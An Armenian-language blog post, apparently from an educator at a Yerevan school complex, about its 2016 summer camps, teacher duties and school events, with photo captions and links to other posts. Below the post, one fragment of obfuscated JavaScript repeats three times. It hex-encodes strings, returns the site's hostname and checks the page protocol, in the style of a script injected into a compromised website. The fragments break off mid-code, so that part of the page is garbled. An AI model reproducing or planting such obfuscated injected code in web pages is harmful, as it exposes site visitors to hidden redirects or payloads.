Մեր ճամբարները բանգլադեշյան կան-գործում են որպես երևանյան փաստեր… Նրանց մասին խոսում են ողջ Երևանում, նրանք շարունակ հանրայնացվում են… Երեկ Դպրոց-պարտեզի քսաներկու հոգանոց ճամբարով, որ ղեկավարում են Քրիստինե Հովսեփյանն ու Բաբկեն Փաշինյանը, Մարմարյա սրահի ընդհանուր պարապմունքից հետո ներխուժում իրականացրինք բրուտանոց… Ի՞նչ կա ավելի գրավիչ-ամառային. ճամբարականներն ավելի ու ավելի վստահ, ճամբարի ռեժիմով որոշված ներխուժումներ պիտի անեն կրթահամալիրի Մայր դպրոցի, Բանգլադեշի, Երևանի, երևանամերձ աշխարհների՝  վեցից տասնչորս տարեկանների մեր լողափային ճամբարները: Ինձ դուր է գալիս Միջին դպրոցի ճամբարի ինքնավստահությունը… Տեսեք, Գոհար Եղոյանն ու իր սաները որքա՜ն գրավիչ պատմում են իրենց ճամբարական առօրյայի մասին… Ուզո՞ւմ եք վրան խփել, գիշերել հենց Բանգլադեշում, համեցե՛ք: Ուզում եք ստեղծել ճամբարային գոտինե՞ր՝ ծղոտե-անտառային լուծումներով, սկսե՛ք, կստանաք լիարժեք աջակցություն… Ճամբարներում մեր ուսուցիչների հերթափոխային աշխատանքը, կարևորելով կամավորությունը-նախաձեռնականությունը, իսկական կյանքով ընտրություն-ատեստացիա է որևէ տեսակի մանկավարժական աշխատանքով զբաղվելու, այդ աշխատանքը շարունակելու համար՝ առանց բացառության… Ճամբարների մեր բազմազանությունը-ինքնահաստատումը-հերթագայությունը, Սևանի «Ժայռի» գոյությունը, արշավախմբային լիարժեք կայանը՝ նոր հանդերձանքով-փորձով-Հրաչյա Առաքելյանով, ինձ իրավունք են տալիս հայտարարել, որ ոչ միայն յուրաքանչյուր հին-նոր սովորող է անցնելու դրսևորվելու-գնահատվելու-հաստատվելու  ճամբարով-կյանքով ուսումնական, այլև ամեն մի սեբաստացի հին-նոր ուսուցիչ… Սա է մեր ճանապարհը, մեր նեղ դուռը՝ այո՛, ճամբարում ճամբարային կյանքով ներառվելու, ճանաչելու, սեբաստացիական հավաքանիում կայանալու-դրսևորվելու, ուսումնական աշխատանքի համար անհրաժեշտ հմտությունները հարմար-անհատական-խմբային միջավայրում ձեռք բերելու՝ սկսած հեծանիվից, լողից, ինքնասպասարկումից… ճամփորդելուց…

Տիրուհի Հակոբյանի վարպետության դասը Գեղարվեստում:

Ես ոչ միայն հայտարարում եմ այս մասին, ես հետապնդելու եմ մինչև իրագործում, ես մանկավարժական լաբորատորիայից, Գևորգ Հակոբյանից, բոլոր դպրոցների և ուսումնական կենտրոնների, մասնախմբերի ղեկավարներից պահանջում եմ պահ առաջ կենտրոնանալ ճամբարային գործունեության կազմակերպման  վրա՝ «Ուսումնական ամառ 2016» ծրագրի ողջ տևողությամբ, ողջ ծավալով, ողջ տեսականիով… Ես, որևէ փաթեթավորմամբ, մատուցմամբ, չեմ հանդուրժի առարկայական ուսուցչի դիկտատը, չեմ թույլատրի երկու սորտի  ուսուցիչների գոյությունը, այսպես ասենք, պրեդմետնիկների և դաստիարակ-կազմակերպիչների… Մեկ աշխատանք՝ մանկավարժությունը, և այն մի հեղինակ-աշխատող ունի՝ մեկ-միասնական մանկավարժական աշխատողը… Ճամբարը, պլեները, հավաքը, ճամփորդությունը, համերգը, ներկայացումը, ցուցադրությունը… ուսումնական պարապմունքի ձևերն են, կրթական ծրագրի կազմակերպիչներ՝ բոլորը միասին:

Հունիսի 17-ին «Կարդում ենք Չարենց». Արմինե Աբրահամյան և ընկերներ:

Երեկ հունիսի 20-ից մեկնարկող մանկավարժության ճամբարների մասին էր իմ նախաձեռնած փոքրակազմ կլոր սեղանը Մարիետ Սիմոնյանի, Սուսան Մարկոսյանի, Գևորգ Հակոբյանի հետ, դրանից ժամեր առաջ՝ իններորդցիների հետ… Ճամբարը ճամբար է դառնում իր պատրաստության շրջանով… Միշտ ուշացա՞ծ… Քննությունների-պլեներ-ստուգատեսներ-լրացուցիչ կրթության համերգների ժամանակային ավարտը օրակարգի թիվ մեկ գործն է դարձնում նախատեսված-հրապարակված-հայտարարված-օրացուցային ճամբարային պատրաստությունը… Ձախողումների-չստացվածների ետևում ավանդական ծուլություն է կամ անկարողություն՝ չկարևորում. հեղինակային կրթական ծրագրի մանկավարժական աշխատողին անհամապատասխանության որևէ խնդիր զանց առնողը չեմ…

Գեղարվեստի սովորող Աննա Սմբատյանի անհատական ցուցահանդեսի բացումը Կրթահամալիրի Վերնիսաժում:

Ամենակրթական կասկադը մեր՝ Բանգլադեշի կրթական պարտեզի արևելք-արևմուտք ճառագայթով ձգվող Զորավար Անդրանիկի Քոլեջ-Արհեստագործական–Առվույտի դաշտ-Նոր դպրոց-Մեծ պուրակ-Խաղադաշտեր-Դպրոց-պարտեզ-Գյուղացիական տնտեսություն հարթակներով, ես երեկ, որպես 2016թ. հարվածային կառույց, կրթահամալիրի թվով երրորդ հրաշալիք, ձիանոց-ձիավարժարան-գյուղացիական տնտեսությունից և ուսումնական վերնիսաժ-կենտրոնից հետո, կասկադում ներկայացրի Անահիտ Մելքոնյանի աշխատանքային ջոկատին… հետո՝ նրանց հետ միասին՝ Մարմարյա սրահում, ընդհանուր ճամբար-պլեներային տողանին՝ իջնելով ջոկատի հետ կասկադի արևելյան դռնից-կողմից… Այսօր դա անում եմ իմ հերթական գրում՝ գալով Խորեն Հազարումյանի ջոկատի հետ կրթական կասկադի արևմտյան մուտքից… Կհանդիպենք նորից Կասկադի կենտրոնում՝ Պուրակում, Մարմարյա սրահում… տողանին։

«Հրաշալիք» ճանապարհի նախագծի շրջայց-քննարկում:

Լուսանկարների հեղինակ, ֆոտոխմբագիր՝ Արմինե Թոփչյան
#703

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Հրեշտակ Սոնուլիկի և Աշոտիկ Դավթի ամանորյա նախագծի կիրակի․․․

Որերորդ կիրակին է իմ կյանքում․․․ Ավելի հեշտ խնդիր՝ քանի՞ կիրակի-պատում կա իմ այս էլ 869 գրերում․․․ Արտասովոր կիրակի եղավ-սկսվեց՝ երեք անգամից, երեք իրար հաջորդող փուլերով, ես արթնանում եմ կեսօրին․․․ Համերաշխ,

Կոնկրետ ու փոքր քայլերով առաջ գնալու մեր ժամանակի մասին է իմ գիրը

Հիմա ես կարդում եմ Մարիա Մոնտեսորիի «Ինքնադաստիարակությունը և ինքնուսուցումը կրտսեր դպրոցում» աշխատությունը՝ մեր Գևորգ Հակոբյանի թարգմանությամբ մեր «Դպիր» ամսագրում, մեր mskh.am-ում։ Ահա ինչպիսի գործուն-սոցիալական-կրթական-մշակութային բաց համակարգ է մեր mskh.am-ը, հեղինակային կրթական

Սիրտ իմ, որ արթուն կայ… Տաթև՝ տա ինձ թևեր

Ուզեցել եմ ու ստացել՝ թևեր. Տա-թև աղջիկ եմ ուզեցել Տաթևում, վանքի բարձունքում կանգնած, հայացքս՝ դեպի Որոտանի կիրճը, ուրիշ ի՞նչ պիտի ուզենա տղամարդը, որ… չունի… Թևեր… Ուրիշ ի՞նչ պիտի ուզենա մարդը՝